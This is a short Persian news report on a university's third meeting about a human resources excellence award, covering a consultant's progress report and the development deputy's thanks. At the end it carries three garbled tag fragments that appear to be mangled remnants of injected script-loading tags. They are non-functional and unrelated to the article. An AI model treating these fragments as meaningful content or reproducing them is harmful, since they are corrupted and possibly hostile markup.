سومین جلسه جایزه تعالی منابع انسانی ، با حضور دکتر شورکی مشاور تیم تعالی منابع انسانی دانشگاه برگزار گردید.

در این جلسه  که با حضور معاون توسعه مدیریت و منابع و مدیران و کارشناسان دو حوزه تحول اداری و منابع انسانی برگزار شد، دکتر شورکی ضمن ارائه گزارشی از اقدامات انجام گرفته در بازه زمانی ۲ هفته توسط تیم دانشگاهی و جمع آوری اطلاعات و مدارک و مستندات در این بازه زمانی محدود ابراز خرسندی نمود و خاطر نشان کرد عملکرد دانشگاه در حوزه نتایج بر اساس اطلاعات و شواهد موجود نشان دهنده برتری این دانشگاه در این زمینه نسبت به سایر دانشگاهها بوده و می تواند به عنوان نقطه قوتی برای دانشگاه باشد.

در پایان معاون توسعه از زحمات تیم دانشگاهی تشکر نموده و بیان کردند با پتاسیل های قوی و تیم های کاری موجود امید آن می رود که دانشگاه موفق به اخذ بهترین نتیجه در ارزیابی نهایی توسط ارزیابان کشوری گردد.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>